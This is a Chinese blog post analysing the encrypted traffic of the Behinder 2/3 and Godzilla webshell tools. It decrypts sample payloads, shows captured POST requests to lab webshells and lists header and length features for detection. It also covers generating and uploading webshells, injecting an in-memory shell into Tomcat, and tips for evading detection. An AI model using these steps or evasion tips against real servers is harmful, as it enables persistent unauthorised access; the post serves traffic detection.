博客园 首页 私信博主 显示目录 隐藏目录 管理
Live2D

冰蝎2,3及哥斯拉特征分析

一、冰蝎2

冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端。

冰蝎的通信过程可以分为两个阶段:密钥协商和加密传输

(1)第一阶段:密钥协商

攻击者通过GET方式请求服务器密钥:

 

这个是代码:

 

这是服务端存储的$_SESSION变量

 

 

 (2)服务器使用密钥解密

服务端使用随机数高16位作为密钥,并且存储到会话的$_SESSION变量中,并返回密钥给攻击者

当我们输入命令操作后,请求方式就会变成POST

 

 

这个是代码段:

因为我本地是有openssl扩展的,所以执行else里面的代码段

可以看到服务端用之前生成的密钥进行AES128解密请求的post数据

这个是我大概写的一个输出脚本:

 

 

base64解码:

 1 @error_reporting(0);
 2 function main($content)
 3 {
 4     $result = array();
 5     $result["status"] = base64_encode("success");
 6     $result["msg"] = base64_encode($content);
 7     $key = $_SESSION['k'];
 8     echo encrypt(json_encode($result),$key);
 9 }
10 
11 function encrypt($data,$key)
12 {
13     if(!extension_loaded('openssl'))
14         {
15             for($i=0;$i<strlen($data);$i++) {
16                  $data[$i] = $data[$i]^$key[$i+1&15]; 
17                 }
18             return $data;
19         }
20     else
21         {
22             return openssl_encrypt($data, "AES128", $key);
23         }
24 }$content="713fd3e0-d2c2-4536-8391-ae12c124a44f";
25 main($content);

然后服务端脚本继续往下执行:

 

这几行的代码就十分好懂了,用分割线生成数组,然后取数组第1位元素的值,最后eval执行

显然它将返回结果也加密了

(3)特征总结

a.ACCEPT字段

冰蝎2默认Accept字段的值很特殊,而且每个阶段都一样

Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2

b.UA字段

冰蝎内置了十余种 UserAgent ,每次连接 shell 会随机选择一个进行使用。但都是比较老的,容易被检测到,但是可以在burp中修改ua头。

c.Content-Length

Content-Length: 16, 16就是冰蝎2连接的特征

 

二、冰蝎3

对比冰蝎2,冰蝎3取消动态密钥获取,目前很多waf等设备都做了冰蝎2的流量特征分析,所以3取消了动态密钥获取;只有在无动态密钥交互失败后,才会进入常规的密钥交互阶段。

 

 

密钥生成可以看出,使用密码的md5结果的前16位。

特征分析:

1)Accept头有application/xhtml+xmlapplication/xmlapplication/signed-exchange属于弱特征

2)ua头该特征属于弱特征。通过burp可以修改,冰蝎3.0内置的默认16个userAgent都比较老。现实生活中很少有人使用,所以这个也可以作为waf规则特征。

 

数据包加密分析:

 

 

当我们去请求连接服务端的shell_bing3.0.php时,会在服务端的会话中存储一个值为"e45e329feb5d925b"的$_SESSION变量,也就是密钥$key

 

 

然后服务端用生成的密钥去解密请求的POST数据包内容

这是我写的小脚本(我其实就是想看看发送的POST数据包内容)

 

 

解密结果:

 

 

再次进行base64解密:

 1 @error_reporting(0);
 2 function main($content)
 3 {
 4     $result = array();
 5     $result["status"] = base64_encode("success");
 6     $result["msg"] = base64_encode($content);
 7     $key = $_SESSION['k'];
 8     echo encrypt(json_encode($result),$key);
 9 }
10 
11 function encrypt($data,$key)
12 {
13     if(!extension_loaded('openssl'))
14         {
15             for($i=0;$i<strlen($data);$i++) {
16                  $data[$i] = $data[$i]^$key[$i+1&15]; 
17                 }
18             return $data;
19         }
20     else
21         {
22             return openssl_encrypt($data, "AES128", $key);
23         }
24 }$content="Xg7QPeZL9pqCKhXs8Sug7C2Uxnoi39z7DQup7oysPVx60VpOEt2HgP1mGm95uA1b1xJ8tjz29YKZSHWDTFQ5MUbFDdzrx4buFBVj2taUJYTbHUq3fa763mSMOirkT9rs99vKdHEuHoZCqBpawjqQQUejU5aHE4FAHHcF24mOpPsL2TU9JgngUkPwPRJZRtXwF";
25 main($content);
@error_reporting(0);
function main($content)
{
    $result = array();
    $result["status"] = base64_encode("success");
    $result["msg"] = base64_encode($content);
    $key = $_SESSION['k'];
    echo encrypt(json_encode($result),$key);
}

function encrypt($data,$key)
{
    if(!extension_loaded('openssl'))
        {
            for($i=0;$i<strlen($data);$i++) {
                 $data[$i] = $data[$i]^$key[$i+1&15]; 
                }
            return $data;
        }
    else
        {
            return openssl_encrypt($data, "AES128", $key);
        }
}$content="Xg7QPeZL9pqCKhXs8Sug7C2Uxnoi39z7DQup7oysPVx60VpOEt2HgP1mGm95uA1b1xJ8tjz29YKZSHWDTFQ5MUbFDdzrx4buFBVj2taUJYTbHUq3fa763mSMOirkT9rs99vKdHEuHoZCqBpawjqQQUejU5aHE4FAHHcF24mOpPsL2TU9JgngUkPwPRJZRtXwF";
main($con

后面的执行代码其实跟冰蝎2类似

 

 

三、哥斯拉

介绍

哥斯拉是一个基于流量、HTTP全加密的webshell管理工具相对于蚁剑,冰蝎;哥斯拉具有以下优点。

全部类型的shell均过市面所有静态查杀

流量加密过市面全部流量waf

Godzilla自带的插件是冰蝎、蚁剑不能比拟的

使用

(1)Godzilla的运行需要java环境,win下直接双击就可,linux下java -jar Godzilla.jar

此时会在同目录下生成data.db数据库存放数据

(2)Godzilla的webshell可以自定义生成操作方法:管理-生成所需的webshell,哥斯拉支持jsp、php、aspx等多种载荷java和c#的载荷原生实现AES加密

java使用AES加密

 

 

php使用异或加密

 

(3)将生成的webshell上传到目标机器,然后在Godzilla目标栏添加相应的url

PHP连接特征

(1)php_XOR_BASE64

设置代理,用burp抓包。截取到特征发现请求都含有"pass="第一个包

POST /hackable/uploads/base.php HTTP/1.1
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 23275
Connection: close
​
pass=KX4nWAFVJ005aWdeUVosCjpuL0k7YApWKGVGfHFTUXg5WDNFOwszSQEDAVVRWjdGKHU3RwBgLEkGRgV5e3cgVCpxP0YBVVBRB3d3WlFZJ0c5bjdcAVEGUgB2BEh%2BXQJeMGMdQAMKN2M
BAmALeE1UWjpuK1wsUjN%2FAVx7RGhzNFwpBFRcBn9YTylIXkJ9Q1F4J2cKVyt7IF4CZmxVeXczVTYGM2Q3CA1pN11GW2taDUQ6bitKOgpYTjlmAFRrWSdJOWE3QAFRK10zZQQCUVo3XyhuFn4hUSBeKnJ0VXt3IFQycS8FAX8nQwAADERRczdGOwQvWAEKN1ICaXxdeW
ASfSBfJFcreyMAJ2BafHFdIFQqdSdJOGAzCABcAVVrWSdJOWI8ADBvVFMBA2deeXM3ATphHXcGb1RTKHJeQn1DUXgFZ1V7JmkRVAdmAFhWcw1FAV8nWQdgI1EAAntUUAcjXwFaXFk7YC9VOXZZS3l3DQQnZwp
XK3sgXgJmbF17YSNeAmEdXDoKNw0CaXsCUU0GXTpYCUc7YC9DOwMMRWhjVFU6WyNKOG8zSQBYVkJ5bBJ9IF8kVyt7IF4qcnRVY3NQQTlxCUkpewVQBml3WlE

第二个包

POST /hackable/uploads/base.php HTTP/1.1
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 51
Connection: close
​
pass=AWEzAAN%2FWFI3XHNGaGBQWDEHPwY4fSQAM2AIDw%3D%3D

(2)php_XOR_RAW

执行ls和cat命令,命令虽然不同,但是发现请求中都含有一样的

:•T[6•
L9e

ls命令的包

POST /hackable/uploads/g.php HTTP/1.1
Cookie: PHPSESSID=oo9hn9d3uqq7661o3oldu0ojo7;
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 56
Connection: close
​
:•T[6•
L9e•[aqP•)[T\••O9t

cat命令的包

POST /hackable/uploads/g.php HTTP/1.1
Cookie: PHPSESSID=oo9hn9d3uqq7661o3oldu0ojo7;
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 72
Connection: close
​
:•T[6•
L9e•h•_8D0c+r•}•L6[gYccY
)[T\••O9t

当以为这就是特征时就大错特错了,这只是这一次连接所含有的特征

内存马

内存shell模块实现了在tomcat中上传一个哥斯拉的马或者冰蝎、菜刀的马。甚至是上传regeorg建立http隧道。

 

在这里我选择上传一个冰蝎马。

 

然后在冰蝎连接,成功连接。

 

内存shell 无日志,会在tomcat重启后消失。

 

ps:哥斯拉避免被查杀技巧:

1.不使用默认密码(pass)

2.修改ua头

3.填充垃圾数据(post的左右)

 

参考:https://www.freebuf.com/articles/web/257956.html

posted @ 2021-03-06 15:46  My_Dreams  阅读(4425)  评论(0编辑  收藏  举报
(function() { $("pre").addClass("prettyprint"); prettyPrint(); })();